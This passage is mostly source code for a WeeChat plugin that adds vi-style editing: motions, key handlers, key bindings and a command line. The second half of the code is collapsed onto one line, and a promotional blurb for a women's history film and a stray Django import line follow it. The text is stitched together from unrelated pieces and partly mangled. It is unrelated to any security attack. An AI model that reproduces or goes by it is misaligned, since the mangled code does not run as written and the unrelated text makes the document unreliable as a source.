                   (not IS_KEYWORD.match(input_line[pos + 1]) or
                    WHITESPACE.match(input_line[pos + 1]))) or
                  (not IS_KEYWORD.match(input_line[pos]) and
                   (IS_KEYWORD.match(input_line[pos + 1]) or
                    WHITESPACE.match(input_line[pos + 1])))):
                found = True
                cur = pos
                break
        # We're at the character before the last and we still found nothing.
        # Go to the last character.
        if not found:
            cur = pos + 1
    return cur, True, False

def motion_E(input_line, cur, count):
    """Go to the end of `count` WORDS and return cusor position.

    See Also:
        `motion_base()`.
    """
    pos = get_pos(input_line, REGEX_MOTION_UPPERCASE_E, cur, True, count)
    if pos == -1:
        return len(input_line), False, False
    return cur + pos, True, False

def motion_b(input_line, cur, count):
    """Go `count` words backwards and return position.

    See Also:
        `motion_base()`.
    """
    # "b" is just "e" on inverted data (e.g. "olleH" instead of "Hello").
    pos_inv = motion_e(input_line[::-1], len(input_line) - cur - 1, count)[0]
    pos = len(input_line) - pos_inv - 1
    return pos, True, False

def motion_B(input_line, cur, count):
    """Go `count` WORDS backwards and return position.

    See Also:
        `motion_base()`.
    """
    new_cur = len(input_line) - cur
    pos = get_pos(input_line[::-1], REGEX_MOTION_UPPERCASE_B, new_cur,
                  count=count)
    if pos == -1:
        return 0, False, False
    pos = len(input_line) - (pos + new_cur + 1)
    return pos, True, False

def motion_ge(input_line, cur, count):
    """Go to end of `count` words backwards and return position.

    See Also:
        `motion_base()`.
    """
    # "ge is just "w" on inverted data (e.g. "olleH" instead of "Hello").
    pos_inv = motion_w(input_line[::-1], len(input_line) - cur - 1, count)[0]
    pos = len(input_line) - pos_inv - 1
    return pos, True, False

def motion_gE(input_line, cur, count):
    """Go to end of `count` WORDS backwards and return position.

    See Also:
        `motion_base()`.
    """
    new_cur = len(input_line) - cur - 1
    pos = get_pos(input_line[::-1], REGEX_MOTION_G_UPPERCASE_E, new_cur,
                  True, count)
    if pos == -1:
        return 0, False, False
    pos = len(input_line) - (pos + new_cur + 1)
    return pos, True, False

def motion_h(input_line, cur, count):
    """Go `count` characters to the left and return position.

    See Also:
        `motion_base()`.
    """
    return max(0, cur - max(count, 1)), False, False

def motion_l(input_line, cur, count):
    """Go `count` characters to the right and return position.

    See Also:
        `motion_base()`.
    """
    return cur + max(count, 1), False, False

def motion_carret(input_line, cur, count):
    """Go to first non-blank character of line and return position.

    See Also:
        `motion_base()`.
    """
    pos = get_pos(input_line, REGEX_MOTION_CARRET, 0)
    return pos, False, False

def motion_dollar(input_line, cur, count):
    """Go to end of line and return position.

    See Also:
        `motion_base()`.
    """
    pos = len(input_line)
    return pos, False, False

def motion_f(input_line, cur, count):
    """Go to `count`'th occurence of character and return position.

    See Also:
        `motion_base()`.
    """
    return start_catching_keys(1, "cb_motion_f", input_line, cur, count)

def cb_motion_f(update_last=True):
    """Callback for `motion_f()`.

    Args:
        update_last (bool, optional): should `last_search_motion` be updated?
            Set to False when calling from `key_semicolon()` or `key_comma()`
            so that the last search motion isn't overwritten.
            Defaults to True.

    See Also:
        `start_catching_keys()`.
    """
    global last_search_motion
    pattern = catching_keys_data['keys']
    pos = get_pos(catching_keys_data['input_line'], re.escape(pattern),
                  catching_keys_data['cur'], True,
                  catching_keys_data['count'])
    catching_keys_data['new_cur'] = max(0, pos) + catching_keys_data['cur']
    if update_last:
        last_search_motion = {'motion': "f", 'data': pattern}
    cb_key_combo_default(None, None, "")

def motion_F(input_line, cur, count):
    """Go to `count`'th occurence of char to the right and return position.

    See Also:
        `motion_base()`.
    """
    return start_catching_keys(1, "cb_motion_F", input_line, cur, count)

def cb_motion_F(update_last=True):
    """Callback for `motion_F()`.

    Args:
        update_last (bool, optional): should `last_search_motion` be updated?
            Set to False when calling from `key_semicolon()` or `key_comma()`
            so that the last search motion isn't overwritten.
            Defaults to True.

    See Also:
        `start_catching_keys()`.
    """
    global last_search_motion
    pattern = catching_keys_data['keys']
    # Search backwards by scanning the reversed input line.
    cur = len(catching_keys_data['input_line']) - catching_keys_data['cur']
    pos = get_pos(catching_keys_data['input_line'][::-1], re.escape(pattern),
                  cur, False,
                  catching_keys_data['count'])
    catching_keys_data['new_cur'] = catching_keys_data['cur'] - max(0,
                                                                    pos + 1)
    if update_last:
        last_search_motion = {'motion': "F", 'data': pattern}
    cb_key_combo_default(None, None, "")

def motion_t(input_line, cur, count):
    """Go to `count`'th occurence of char and return position.

    The position returned is the position of the character to the left of
    char.

    See Also:
        `motion_base()`.
    """
    return start_catching_keys(1, "cb_motion_t", input_line, cur, count)

def cb_motion_t(update_last=True):
    """Callback for `motion_t()`.

    Args:
        update_last (bool, optional): should `last_search_motion` be updated?
            Set to False when calling from `key_semicolon()` or `key_comma()`
            so that the last search motion isn't overwritten.
            Defaults to True.

    See Also:
        `start_catching_keys()`.
    """
    global last_search_motion
    pattern = catching_keys_data['keys']
    pos = get_pos(catching_keys_data['input_line'], re.escape(pattern),
                  catching_keys_data['cur'] + 1,
                  True, catching_keys_data['count'])
    pos += 1
    if pos > 0:
        # Stop one character before the match ("till").
        catching_keys_data['new_cur'] = pos + catching_keys_data['cur'] - 1
    else:
        catching_keys_data['new_cur'] = catching_keys_data['cur']
    if update_last:
        last_search_motion = {'motion': "t", 'data': pattern}
    cb_key_combo_default(None, None, "")

def motion_T(input_line, cur, count):
    """Go to `count`'th occurence of char to the left and return position.

    The position returned is the position of the character to the right of
    char.

    See Also:
        `motion_base()`.
    """
    return start_catching_keys(1, "cb_motion_T", input_line, cur, count)

def cb_motion_T(update_last=True):
    """Callback for `motion_T()`.

    Args:
        update_last (bool, optional): should `last_search_motion` be updated?
            Set to False when calling from `key_semicolon()` or `key_comma()`
            so that the last search motion isn't overwritten.
            Defaults to True.

    See Also:
        `start_catching_keys()`.
    """
    global last_search_motion
    pattern = catching_keys_data['keys']
    # Search backwards by scanning the reversed input line.
    pos = get_pos(catching_keys_data['input_line'][::-1], re.escape(pattern),
                  (len(catching_keys_data['input_line']) -
                   (catching_keys_data['cur'] + 1)) + 1,
                  True, catching_keys_data['count'])
    pos += 1
    if pos > 0:
        # Stop one character after the match ("till", backwards).
        catching_keys_data['new_cur'] = catching_keys_data['cur'] - pos + 1
    else:
        catching_keys_data['new_cur'] = catching_keys_data['cur']
    if update_last:
        last_search_motion = {'motion': "T", 'data': pattern}
    cb_key_combo_default(None, None, "")


# Keys:
# -----

def key_cc(buf, input_line, cur, count):
    """Delete line and start Insert mode.

    See Also:
        `key_base()`.
    """
    weechat.command("", "/input delete_line")
    set_mode("INSERT")

def key_C(buf, input_line, cur, count):
    """Delete from cursor to end of line and start Insert mode.

    See Also:
        `key_base()`.
    """
    weechat.command("", "/input delete_end_of_line")
    set_mode("INSERT")

def key_yy(buf, input_line, cur, count):
    """Yank line.

    The whole input line is copied to the X clipboard via `xclip`.

    See Also:
        `key_base()`.
    """
    proc = subprocess.Popen(["xclip", "-selection", "c"],
                            stdin=subprocess.PIPE)
    proc.communicate(input=input_line)

def key_i(buf, input_line, cur, count):
    """Start Insert mode.

    See Also:
        `key_base()`.
    """
    set_mode("INSERT")

def key_a(buf, input_line, cur, count):
    """Move cursor one character to the right and start Insert mode.

    See Also:
        `key_base()`.
    """
    set_cur(buf, input_line, cur + 1, False)
    set_mode("INSERT")

def key_A(buf, input_line, cur, count):
    """Move cursor to end of line and start Insert mode.

    See Also:
        `key_base()`.
    """
    set_cur(buf, input_line, len(input_line), False)
    set_mode("INSERT")

def key_I(buf, input_line, cur, count):
    """Move cursor to first non-blank character and start Insert mode.

    See Also:
        `key_base()`.
    """
    pos, _, _ = motion_carret(input_line, cur, 0)
    set_cur(buf, input_line, pos)
    set_mode("INSERT")

def key_G(buf, input_line, cur, count):
    """Scroll to specified line or bottom of buffer.

    See Also:
        `key_base()`.
    """
    if count > 0:
        # This is necessary to prevent weird scroll jumps.
        weechat.command("", "/window scroll_top")
        weechat.command("", "/window scroll %s" % (count - 1))
    else:
        weechat.command("", "/window scroll_bottom")

def key_r(buf, input_line, cur, count):
    """Replace `count` characters under the cursor.

    See Also:
        `key_base()`.
    """
    start_catching_keys(1, "cb_key_r", input_line, cur, count, buf)

def cb_key_r():
    """Callback for `key_r()`.

    See Also:
        `start_catching_keys()`.
    """
    global catching_keys_data
    input_line = list(catching_keys_data['input_line'])
    count = max(catching_keys_data['count'], 1)
    cur = catching_keys_data['cur']
    # Only replace if the whole run of `count` characters fits in the line
    # (mirrors vim, where "3rx" near the end of the line does nothing).
    if cur + count <= len(input_line):
        for _ in range(count):
            input_line[cur] = catching_keys_data['keys']
            cur += 1
        input_line = "".join(input_line)
        weechat.buffer_set(catching_keys_data['buf'], "input", input_line)
        set_cur(catching_keys_data['buf'], input_line, cur - 1)
    catching_keys_data = {'amount': 0}

def key_R(buf, input_line, cur, count):
    """Start Replace mode.

    See Also:
        `key_base()`.
    """
    set_mode("REPLACE")

def key_tilda(buf, input_line, cur, count):
    """Switch the case of `count` characters under the cursor.

    See Also:
        `key_base()`.
    """
    input_line = list(input_line)
    count = max(1, count)
    while count and cur < len(input_line):
        input_line[cur] = input_line[cur].swapcase()
        count -= 1
        cur += 1
    input_line = "".join(input_line)
    weechat.buffer_set(buf, "input", input_line)
    set_cur(buf, input_line, cur)

def key_alt_j(buf, input_line, cur, count):
    """Go to WeeChat buffer.

    Called to preserve WeeChat's alt-j buffer switching.

    This is only called when alt-j<num> is pressed after pressing Esc,
    because \x01\x01j is received in key_combo_default which becomes \x01j
    after removing the detected Esc key.
    If Esc isn't the last pressed key, \x01j<num> is directly received in
    key_combo_default.
    """
    start_catching_keys(2, "cb_key_alt_j", input_line, cur, count)

def cb_key_alt_j():
    """Callback for `key_alt_j()`.

    See Also:
        `start_catching_keys()`.
    """
    global catching_keys_data
    weechat.command("", "/buffer " + catching_keys_data['keys'])
    catching_keys_data = {'amount': 0}

def key_semicolon(buf, input_line, cur, count, swap=False):
    """Repeat last f, t, F, T `count` times.

    Args:
        swap (bool, optional): if True, the last motion will be repeated in
            the opposite direction (e.g. "f" instead of "F"). Defaults to
            False.

    See Also:
        `key_base()`.
    """
    global catching_keys_data, vi_buffer
    catching_keys_data = ({'amount': 0,
                           'input_line': input_line,
                           'cur': cur,
                           'keys': last_search_motion['data'],
                           'count': count,
                           'new_cur': 0,
                           'buf': buf})
    # Swap the motion's case if called from key_comma.
    if swap:
        motion = last_search_motion['motion'].swapcase()
    else:
        motion = last_search_motion['motion']
    func = "cb_motion_%s" % motion
    vi_buffer = motion
    # Dispatch to the matching cb_motion_* by name; False means "don't
    # overwrite last_search_motion".
    globals()[func](False)

def key_comma(buf, input_line, cur, count):
    """Repeat last f, t, F, T in opposite direction `count` times.

    See Also:
        `key_base()`.
    """
    key_semicolon(buf, input_line, cur, count, True)


# Vi key bindings.
# ================
# String values will be executed as normal WeeChat commands.
# For functions, see `key_base()` for reference.
VI_KEYS = {'j': "/window scroll_down", 'k': "/window scroll_up", 'G': key_G, 'gg': "/window scroll_top", 'x': "/input delete_next_char", 'X': "/input delete_previous_char", 'dd': "/input delete_line", 'D': "/input delete_end_of_line", 'cc': key_cc, 'C': key_C, 'i': key_i, 'a': key_a, 'A': key_A, 'I': key_I, 'yy': key_yy, 'p': "/input clipboard_paste", '/': "/input search_text", 'gt': "/buffer +1", 'K': "/buffer +1", 'gT': "/buffer -1", 'J': "/buffer -1", 'r': key_r, 'R': key_R, '~': key_tilda, '\x01[[A': "/input history_previous", '\x01[[B': "/input history_next", '\x01[[C': "/input move_next_char", '\x01[[D': "/input move_previous_char", '\x01[[H': "/input move_beginning_of_line", '\x01[[F': "/input move_end_of_line", '\x01[[5~': "/window page_up", '\x01[[6~': "/window page_down", '\x01[[3~': "/input delete_next_char", '\x01[[2~': key_i, '\x01M': "/input return", '\x01?': "/input move_previous_char", ' ': "/input move_next_char", '\x01[j': key_alt_j, '\x01[1': "/buffer *1", '\x01[2': "/buffer *2", '\x01[3': "/buffer *3", '\x01[4': "/buffer *4", '\x01[5': "/buffer *5", '\x01[6': "/buffer *6", '\x01[7': "/buffer *7", '\x01[8': "/buffer *8", '\x01[9': "/buffer *9", '\x01[0': "/buffer *10", '\x01^': "/input jump_last_buffer_displayed", '\x01D': "/window page_down", '\x01U': "/window page_up", '\x01Wh': "/window left", '\x01Wj': "/window down", '\x01Wk': "/window up", '\x01Wl': "/window right", '\x01W=': "/window balance", '\x01Wx': "/window swap", '\x01Ws': "/window splith", '\x01Wv': "/window splitv", '\x01Wq': "/window merge", ';': key_semicolon, ',': key_comma} # Add alt-j<number> bindings. for i in range(10, 99): VI_KEYS['\x01[j%s' % i] = "/buffer %s" % i # Key handling. # ============= def cb_key_pressed(data, signal, signal_data): """Detect potential Esc presses. Alt and Esc are detected as the same key in most terminals. The difference is that Alt signal is sent just before the other pressed key's signal. 
We therefore use a timeout (50ms) to detect whether Alt or Esc was pressed. """ global last_signal_time last_signal_time = time.time() if signal_data == "\x01[": # In 50ms, check if any other keys were pressed. If not, it's Esc! weechat.hook_timer(50, 0, 1, "cb_check_esc", "{:f}".format(last_signal_time)) return weechat.WEECHAT_RC_OK def cb_check_esc(data, remaining_calls): """Check if the Esc key was pressed and change the mode accordingly.""" global esc_pressed, vi_buffer, cmd_text, catching_keys_data if last_signal_time == float(data): esc_pressed += 1 set_mode("NORMAL") # Cancel any current partial commands. vi_buffer = "" cmd_text = "" weechat.command("", "/bar hide vi_cmd") catching_keys_data = {'amount': 0} weechat.bar_item_update("vi_buffer") return weechat.WEECHAT_RC_OK def cb_key_combo_default(data, signal, signal_data): """Eat and handle key events when in Normal mode, if needed. The key_combo_default signal is sent when a key combo is pressed. For example, alt-k will send the "\x01[k" signal. Esc is handled a bit differently to avoid delays, see `cb_key_pressed()`. """ global esc_pressed, vi_buffer, cmd_text # If Esc was pressed, strip the Esc part from the pressed keys. # Example: user presses Esc followed by i. This is detected as "\x01[i", # but we only want to handle "i". keys = signal_data if esc_pressed or esc_pressed == -2: if keys.startswith("\x01[" * esc_pressed): # Multiples of 3 seem to "cancel" themselves, # e.g. Esc-Esc-Esc-Alt-j-11 is detected as "\x01[\x01[\x01" # followed by "\x01[j11" (two different signals). if signal_data == "\x01[" * 3: esc_pressed = -1 # `cb_check_esc()` will increment it to 0. else: esc_pressed = 0 # This can happen if a valid combination is started but interrupted # with Esc, such as Ctrl-W→Esc→w which would send two signals: # "\x01W\x01[" then "\x01W\x01[w". # In that case, we still need to handle the next signal ("\x01W\x01[w") # so we use the special value "-2". 
else: esc_pressed = -2 keys = keys.split("\x01[")[-1] # Remove the "Esc" part(s). # Ctrl-Space. elif keys == "\x01@": set_mode("NORMAL") return weechat.WEECHAT_RC_OK_EAT # Nothing to do here. if mode == "INSERT": return weechat.WEECHAT_RC_OK # We're in Replace mode — allow "normal" key presses (e.g. "a") and # overwrite the next character with them, but let the other key presses # pass normally (e.g. backspace, arrow keys, etc). if mode == "REPLACE": if len(keys) == 1: weechat.command("", "/input delete_next_char") elif keys == "\x01?": weechat.command("", "/input move_previous_char") return weechat.WEECHAT_RC_OK_EAT return weechat.WEECHAT_RC_OK # We're catching keys! Only "normal" key presses interest us (e.g. "a"), # not complex ones (e.g. backspace). if len(keys) == 1 and catching_keys_data['amount']: catching_keys_data['keys'] += keys catching_keys_data['amount'] -= 1 # Done catching keys, execute the callback. if catching_keys_data['amount'] == 0: globals()[catching_keys_data['callback']]() vi_buffer = "" weechat.bar_item_update("vi_buffer") return weechat.WEECHAT_RC_OK_EAT # We're in command-line mode. if cmd_text: # Backspace key. if keys == "\x01?": # Remove the last character from our command line. cmd_text = list(cmd_text) del cmd_text[-1] cmd_text = "".join(cmd_text) # Return key. elif keys == "\x01M": weechat.hook_timer(1, 0, 1, "cb_exec_cmd", cmd_text) cmd_text = "" # Input. elif len(keys) == 1: cmd_text += keys # Update (and maybe hide) the bar item. weechat.bar_item_update("cmd_text") if not cmd_text: weechat.command("", "/bar hide vi_cmd") return weechat.WEECHAT_RC_OK_EAT # Enter command mode. elif keys == ":": cmd_text += ":" weechat.command("", "/bar show vi_cmd") weechat.bar_item_update("cmd_text") return weechat.WEECHAT_RC_OK_EAT # Add key to the buffer. vi_buffer += keys weechat.bar_item_update("vi_buffer") if not vi_buffer: return weechat.WEECHAT_RC_OK # Check if the keys have a (partial or full) match. 
If so, also get the # keys without the count. (These are the actual keys we should handle.) # After that, `vi_buffer` is only used for display purposes — only # `vi_keys` is checked for all the handling. # If no matches are found, the keys buffer is cleared. matched, vi_keys, count = get_keys_and_count(vi_buffer) if not matched: vi_buffer = "" return weechat.WEECHAT_RC_OK_EAT buf = weechat.current_buffer() input_line = weechat.buffer_get_string(buf, "input") cur = weechat.buffer_get_integer(buf, "input_pos") # It's a key. If the corresponding value is a string, we assume it's a # WeeChat command. Otherwise, it's a method we'll call. if vi_keys in VI_KEYS: if isinstance(VI_KEYS[vi_keys], str): for _ in range(max(count, 1)): # This is to avoid crashing WeeChat on script reloads/unloads, # because no hooks must still be running when a script is # reloaded or unloaded. if VI_KEYS[vi_keys] == "/input return": return weechat.WEECHAT_RC_OK weechat.command("", VI_KEYS[vi_keys]) current_cur = weechat.buffer_get_integer(buf, "input_pos") set_cur(buf, input_line, current_cur) else: VI_KEYS[vi_keys](buf, input_line, cur, count) # It's a motion (e.g. "w") — call `motion_X()` where X is the motion, then # set the cursor's position to what that function returned. elif vi_keys in VI_MOTIONS: if vi_keys in SPECIAL_CHARS: func = "motion_%s" % SPECIAL_CHARS[vi_keys] else: func = "motion_%s" % vi_keys end, _, _ = globals()[func](input_line, cur, count) set_cur(buf, input_line, end) # It's an operator + motion (e.g. "dw") — call `motion_X()` (where X is # the motion), then we call `operator_Y()` (where Y is the operator) # with the position `motion_X()` returned. `operator_Y()` should then # handle changing the input line. 
elif (len(vi_keys) > 1 and vi_keys[0] in VI_OPERATORS and vi_keys[1:] in VI_MOTIONS): if vi_keys[1:] in SPECIAL_CHARS: func = "motion_%s" % SPECIAL_CHARS[vi_keys[1:]] else: func = "motion_%s" % vi_keys[1:] pos, overwrite, catching = globals()[func](input_line, cur, count) # If it's a catching motion, we don't want to call the operator just # yet -- this code will run again when the motion is complete, at which # point we will. if not catching: oper = "operator_%s" % vi_keys[0] globals()[oper](buf, input_line, cur, pos, overwrite) # The combo isn't completed yet (e.g. just "d"). else: return weechat.WEECHAT_RC_OK_EAT # We've already handled the key combo, so clear the keys buffer. if not catching_keys_data['amount']: vi_buffer = "" weechat.bar_item_update("vi_buffer") return weechat.WEECHAT_RC_OK_EAT # Callbacks. # ========== # Bar items. # ---------- def cb_vi_buffer(data, item, window): """Return the content of the vi buffer (pressed keys on hold).""" return vi_buffer def cb_cmd_text(data, item, window): """Return the text of the command line.""" return cmd_text def cb_mode_indicator(data, item, window): """Return the current mode (INSERT/NORMAL/REPLACE).""" return mode def cb_line_numbers(data, item, window): """Fill the line numbers bar item.""" bar_height = weechat.window_get_integer(window, "win_chat_height") content = "" for i in range(1, bar_height + 1): content += "%s \n" % i return content # Callbacks for the line numbers bar. # ................................... def cb_update_line_numbers(data, signal, signal_data): """Call `cb_timer_update_line_numbers()` when switching buffers. A timer is required because the bar item is refreshed before the new buffer is actually displayed, so ``win_chat_height`` would refer to the old buffer. Using a timer refreshes the item after the new buffer is displayed. 
""" weechat.hook_timer(10, 0, 1, "cb_timer_update_line_numbers", "") return weechat.WEECHAT_RC_OK def cb_timer_update_line_numbers(data, remaining_calls): """Update the line numbers bar item.""" weechat.bar_item_update("line_numbers") return weechat.WEECHAT_RC_OK # Config. # ------- def cb_config(data, option, value): """Script option changed, update our copy.""" option_name = option.split(".")[-1] if option_name in vimode_settings: vimode_settings[option_name] = value return weechat.WEECHAT_RC_OK # Command-line execution. # ----------------------- def cb_exec_cmd(data, remaining_calls): """Translate and execute our custom commands to WeeChat command.""" # Process the entered command. data = list(data) del data[0] data = "".join(data) # s/foo/bar command. if data.startswith("s/"): cmd = data parsed_cmd = next(csv.reader(StringIO(cmd), delimiter="/", escapechar="\\")) pattern = re.escape(parsed_cmd[1]) repl = parsed_cmd[2] repl = re.sub(r"([^\\])&", r"\1" + pattern, repl) flag = None if len(parsed_cmd) == 4: flag = parsed_cmd[3] count = 1 if flag == "g": count = 0 buf = weechat.current_buffer() input_line = weechat.buffer_get_string(buf, "input") input_line = re.sub(pattern, repl, input_line, count) weechat.buffer_set(buf, "input", input_line) # Shell command. elif data.startswith("!"): weechat.command("", "/exec -buffer shell %s" % data[1:]) # Commands like `:22`. This should start cursor mode (``/cursor``) and take # us to the relevant line. # TODO: look into possible replacement key bindings for: ← ↑ → ↓ Q m q. elif data.isdigit(): line_number = int(data) hdata_window = weechat.hdata_get("window") window = weechat.current_window() x = weechat.hdata_integer(hdata_window, window, "win_chat_x") y = (weechat.hdata_integer(hdata_window, window, "win_chat_y") + (line_number - 1)) weechat.command("", "/cursor go {},{}".format(x, y)) # Check againt defined commands. 
else: data = data.split(" ", 1) cmd = data[0] args = "" if len(data) == 2: args = data[1] if cmd in VI_COMMANDS: weechat.command("", "%s %s" % (VI_COMMANDS[cmd], args)) # No vi commands defined, run the command as a WeeChat command. else: weechat.command("", "/{} {}".format(cmd, args)) return weechat.WEECHAT_RC_OK # Script commands. # ---------------- def cb_vimode_cmd(data, buf, args): """Handle script commands (``/vimode <command>``).""" # ``/vimode`` or ``/vimode help`` if not args or args == "help": weechat.prnt("", "[vimode.py] %s" % README_URL) # ``/vimode bind_keys`` or ``/vimode bind_keys --list`` elif args.startswith("bind_keys"): infolist = weechat.infolist_get("key", "", "default") weechat.infolist_reset_item_cursor(infolist) commands = ["/key unbind ctrl-W", "/key bind ctrl-W /input delete_previous_word", "/key bind ctrl-^ /input jump_last_buffer_displayed", "/key bind ctrl-Wh /window left", "/key bind ctrl-Wj /window down", "/key bind ctrl-Wk /window up", "/key bind ctrl-Wl /window right", "/key bind ctrl-W= /window balance", "/key bind ctrl-Wx /window swap", "/key bind ctrl-Ws /window splith", "/key bind ctrl-Wv /window splitv", "/key bind ctrl-Wq /window merge"] while weechat.infolist_next(infolist): key = weechat.infolist_string(infolist, "key") if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key): commands.append("/key unbind %s" % key) if args == "bind_keys": weechat.prnt("", "Running commands:") for command in commands: weechat.command("", command) weechat.prnt("", "Done.") elif args == "bind_keys --list": weechat.prnt("", "Listing commands we'll run:") for command in commands: weechat.prnt("", " %s" % command) weechat.prnt("", "Done.") return weechat.WEECHAT_RC_OK # Helpers. # ======== # Motions/keys helpers. # --------------------- def get_pos(data, regex, cur, ignore_cur=False, count=0): """Return the position of `regex` match in `data`, starting at `cur`. Args: data (str): the data to search in. regex (pattern): regex pattern to search for. 
cur (int): where to start the search. ignore_cur (bool, optional): should the first match be ignored if it's also the character at `cur`? Defaults to False. count (int, optional): the index of the match to return. Defaults to 0. Returns: int: position of the match. -1 if no matches are found. """ # List of the *positions* of the found patterns. matches = [m.start() for m in re.finditer(regex, data[cur:])] pos = -1 if count: if len(matches) > count - 1: if ignore_cur and matches[0] == 0: if len(matches) > count: pos = matches[count] else: pos = matches[count - 1] elif matches: if ignore_cur and matches[0] == 0: if len(matches) > 1: pos = matches[1] else: pos = matches[0] return pos def set_cur(buf, input_line, pos, cap=True): """Set the cursor's position. Args: buf (str): pointer to the current WeeChat buffer. input_line (str): the content of the input line. pos (int): the position to set the cursor to. cap (bool, optional): if True, the `pos` will shortened to the length of `input_line` if it's too long. Defaults to True. """ if cap: pos = min(pos, len(input_line) - 1) weechat.buffer_set(buf, "input_pos", str(pos)) def start_catching_keys(amount, callback, input_line, cur, count, buf=None): """Start catching keys. Used for special commands (e.g. "f", "r"). amount (int): amount of keys to catch. callback (str): name of method to call once all keys are caught. input_line (str): input line's content. cur (int): cursor's position. count (int): count, e.g. "2" for "2fs". buf (str, optional): pointer to the current WeeChat buffer. Defaults to None. `catching_keys_data` is a dict with the above arguments, as well as: keys (str): pressed keys will be added under this key. new_cur (int): the new cursor's position, set in the callback. When catching keys is active, normal pressed keys (e.g. "a" but not arrows) will get added to `catching_keys_data` under the key "keys", and will not be handled any further. 
Once all keys are caught, the method defined in the "callback" key is called, and can use the data in `catching_keys_data` to perform its action. """ global catching_keys_data if "new_cur" in catching_keys_data: new_cur = catching_keys_data['new_cur'] catching_keys_data = {'amount': 0} return new_cur, True, False catching_keys_data = ({'amount': amount, 'callback': callback, 'input_line': input_line, 'cur': cur, 'keys': "", 'count': count, 'new_cur': 0, 'buf': buf}) return cur, False, True def get_keys_and_count(combo): """Check if `combo` is a valid combo and extract keys/counts if so. Args: combo (str): pressed keys combo. Returns: matched (bool): True if the combo has a (partial or full) match, False otherwise. combo (str): `combo` with the count removed. These are the actual keys we should handle. count (int): count for `combo`. """ # Look for a potential match (e.g. "d" might become "dw" or "dd" so we # accept it, but "d9" is invalid). matched = False # Digits are allowed at the beginning (counts or "0"). count = 0 if combo.isdigit(): matched = True elif combo and combo[0].isdigit(): count = "" for char in combo: if char.isdigit(): count += char else: break combo = combo.replace(count, "", 1) count = int(count) # Check against defined keys. if not matched: for key in VI_KEYS: if key.startswith(combo): matched = True break # Check against defined motions. if not matched: for motion in VI_MOTIONS: if motion.startswith(combo): matched = True break # Check against defined operators + motions. if not matched: for operator in VI_OPERATORS: if combo.startswith(operator): # Check for counts before the motion (but after the operator). vi_keys_no_op = combo[len(operator):] # There's no motion yet. if vi_keys_no_op.isdigit(): matched = True break # Get the motion count, then multiply the operator count by # it, similar to vim's behavior. 
elif vi_keys_no_op and vi_keys_no_op[0].isdigit(): motion_count = "" for char in vi_keys_no_op: if char.isdigit(): motion_count += char else: break # Remove counts from `vi_keys_no_op`. combo = combo.replace(motion_count, "", 1) motion_count = int(motion_count) count = max(count, 1) * motion_count # Check against defined motions. for motion in VI_MOTIONS: if motion.startswith(combo[1:]): matched = True break return matched, combo, count # Other helpers. # -------------- def set_mode(arg): """Set the current mode and update the bar mode indicator.""" global mode mode = arg # If we're going to Normal mode, the cursor must move one character to the # left. if mode == "NORMAL": buf = weechat.current_buffer() input_line = weechat.buffer_get_string(buf, "input") cur = weechat.buffer_get_integer(buf, "input_pos") set_cur(buf, input_line, cur - 1, False) weechat.bar_item_update("mode_indicator") def print_warning(text): """Print warning, in red, to the current buffer.""" weechat.prnt("", ("%s[vimode.py] %s" % (weechat.color("red"), text))) def check_warnings(): """Warn the user about problematic key bindings and tmux/screen.""" user_warned = False # Warn the user about problematic key bindings that may conflict with # vimode. # The solution is to remove these key bindings, but that's up to the user. 
infolist = weechat.infolist_get("key", "", "default") problematic_keybindings = [] while weechat.infolist_next(infolist): key = weechat.infolist_string(infolist, "key") command = weechat.infolist_string(infolist, "command") if re.match(REGEX_PROBLEMATIC_KEYBINDINGS, key): problematic_keybindings.append("%s -> %s" % (key, command)) if problematic_keybindings: user_warned = True print_warning("Problematic keybindings detected:") for keybinding in problematic_keybindings: print_warning(" %s" % keybinding) print_warning("These keybindings may conflict with vimode.") print_warning("You can remove problematic key bindings and add" " recommended ones by using /vimode bind_keys, or only" " list them with /vimode bind_keys --list") print_warning("For help, see: %s" % FAQ_KEYBINDINGS) del problematic_keybindings # Warn tmux/screen users about possible Esc detection delays. if "STY" in os.environ or "TMUX" in os.environ: if user_warned: weechat.prnt("", "") user_warned = True print_warning("tmux/screen users, see: %s" % FAQ_ESC) if (user_warned and not weechat.config_string_to_boolean(vimode_settings['no_warn'])): if user_warned: weechat.prnt("", "") print_warning("To force disable warnings, you can set" " plugins.var.python.vimode.no_warn to 'on'") # Main script. # ============ if __name__ == "__main__": weechat.register(SCRIPT_NAME, SCRIPT_AUTHOR, SCRIPT_VERSION, SCRIPT_LICENSE, SCRIPT_DESC, "", "") # Warn the user if he's using an unsupported WeeChat version. VERSION = weechat.info_get("version_number", "") if int(VERSION) < 0x01000000: print_warning("Please upgrade to WeeChat ≥ 1.0.0. Previous versions" " are not supported.") # Set up script options. 
for option, value in vimode_settings.items(): if weechat.config_is_set_plugin(option): vimode_settings[option] = weechat.config_get_plugin(option) else: weechat.config_set_plugin(option, value[0]) vimode_settings[option] = value[0] weechat.config_set_desc_plugin(option, "%s (default: \"%s\")" % (value[1], value[0])) # Warn the user about possible problems if necessary. if not weechat.config_string_to_boolean(vimode_settings['no_warn']): check_warnings() # Create bar items and setup hooks. weechat.bar_item_new("mode_indicator", "cb_mode_indicator", "") weechat.bar_item_new("cmd_text", "cb_cmd_text", "") weechat.bar_item_new("vi_buffer", "cb_vi_buffer", "") weechat.bar_item_new("line_numbers", "cb_line_numbers", "") weechat.bar_new("vi_cmd", "off", "0", "root", "", "bottom", "vertical", "vertical", "0", "0", "default", "default", "default", "0", "cmd_text") weechat.bar_new("vi_line_numbers", "on", "0", "window", "", "left", "vertical", "vertical", "0", "0", "default", "default", "default", "0", "line_numbers") weechat.hook_config("plugins.var.python.%s.*" % SCRIPT_NAME, "cb_config", "") weechat.hook_signal("key_pressed", "cb_key_pressed", "") weechat.hook_signal("key_combo_default", "cb_key_combo_default", "") weechat.hook_signal("buffer_switch", "cb_update_line_numbers", "") weechat.hook_command("vimode", SCRIPT_DESC, "[help | bind_keys [--list]]", " help: show help\n" "bind_keys: unbind problematic keys, and bind" " recommended keys to use in WeeChat\n" " --list: only list changes", "help || bind_keys |--list", "cb_vimode_cmd", "")
As a part of our Women’s History Month celebration, HelloBeautiful is proud to present our first HB Studios short film “Women on Top”. This 14-minute straight talk documentary features Soledad O’Brien, Lisa Leslie, Eve, Anika Noni Rose, Jurnee Smollett, Jody Watley, Chrisette Michele, Tia Mowry and Beverly Johnson in an unfiltered discussion about womanhood, power, femininity, sexuality and sisterhood. Watch and enjoy! Join us on Twitter Thursdays during March at 1 p.m. for #WOT conversations with @hellobeautiful and ladies featured in the film. 1. The Launch of "Women on Top"
from snippets.models import Snippet
